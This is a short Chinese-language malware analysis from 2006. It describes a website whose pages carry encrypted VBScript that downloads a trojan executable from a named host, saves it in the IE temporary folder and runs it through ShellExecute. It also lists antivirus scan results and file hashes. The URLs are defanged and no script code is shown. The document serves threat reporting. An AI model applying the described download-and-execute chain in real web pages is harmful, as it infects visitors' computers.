endurer 原创
2006-09-06 第2版
2006-09-02 第1版
网站 hxxp://www.94l***m.com/ 首页会根据cookie的值打开网页:
/------------
hxxp://www.dudu**w.com/web/dudu*****13.htm
------------/
或
/------------
hxxp://www.dud**uw.com/web/dudu*****12.htm
------------/
dudu*****13.htm 和 dudu*****12.htm 中有加密的VBScript脚本代码,该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://qidong.virussky.com/qidong.exe,保存为 IE临时文件夹中的 an85.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
File: | qidong.exe |
Status: | INFECTED/MALWARE |
MD5 | f932ee7f241695d5ee6527a231795468 |
Packers detected: |
UPX
|
Scanner results | |
AntiVir | Found Heuristic/Malware (probable variant) |
ArcaVir | Found nothing |
Avast | Found nothing |
AVG Antivirus | Found nothing |
BitDefender | Found Generic.Malware.BE!g.66E35076 |
ClamAV | Found nothing |
Dr.Web | Found Trojan.Update |
F-Prot Antivirus | Found nothing |
Fortinet | Found nothing |
Kaspersky Anti-Virus | Found Trojan-Downloader.Win32.Agent.aqr |
NOD32 | Found probably unknown NewHeur_PE (probable variant) |
Norman Virus Control | Found nothing |
UNA | Found nothing |
VirusBuster | Found nothing |
VBA32 | Found nothing |
Antivirus | Version | Update | Result |
AntiVir | 7.1.1.11 | 09.06.2006 | TR/Dldr.Agent.aqr.15 |
Authentium | 4.93.8 | 09.06.2006 | no virus found |
Avast | 4.7.844.0 | 09.06.2006 | no virus found |
AVG | 386 | 09.06.2006 | Downloader.Agent.FGL |
BitDefender | 7.2 | 09.06.2006 | Generic.Malware.BE!g.66E35076 |
CAT-QuickHeal | 8.00 | 09.05.2006 | no virus found |
ClamAV | devel-20060426 | 09.06.2006 | no virus found |
DrWeb | 4.33 | 09.06.2006 | Trojan.Update |
eTrust-InoculateIT | 23.72.117 | 09.05.2006 | no virus found |
eTrust-Vet | 30.3.3064 | 09.06.2006 | no virus found |
Ewido | 4.0 | 09.05.2006 | Downloader.Agent.aqr |
Fortinet | 2.77.0.0 | 09.06.2006 | no virus found |
F-Prot | 3.16f | 09.06.2006 | no virus found |
F-Prot4 | 4.2.1.29 | 09.06.2006 | no virus found |
Ikarus | 0.2.65.0 | 09.06.2006 | no virus found |
Kaspersky | 4.0.2.24 | 09.06.2006 | Trojan-Downloader.Win32.Agent.aqr |
McAfee | 4845 | 09.05.2006 | Downloader-AWE |
Microsoft | 1.1560 | 09.06.2006 | no virus found |
NOD32v2 | 1.1741 | 09.06.2006 | probably unknown NewHeur_PE virus |
Norman | 5.90.23 | 09.06.2006 | no virus found |
Panda | 9.0.0.4 | 09.05.2006 | Trj/Delf.ABZ |
Sophos | 4.09.0 | 09.06.2006 | no virus found |
Symantec | 8.0 | 09.06.2006 | no virus found |
TheHacker | 5.9.8.205 | 09.06.2006 | Posible_Worm322 |
UNA | 1.83 | 09.06.2006 | no virus found |
VBA32 | 3.11.1 | 09.05.2006 | Trojan-Downloader.Win32.Agent.aqr |
VirusBuster | 4.3.7:9 | 09.06.2006 | no virus found |
Aditional Information |
File size: 31744 bytes |
MD5: f932ee7f241695d5ee6527a231795468 |
SHA1: 6414ec3d64ede47a4eec4cd07166380b223431da |
packers: UPX, embedded |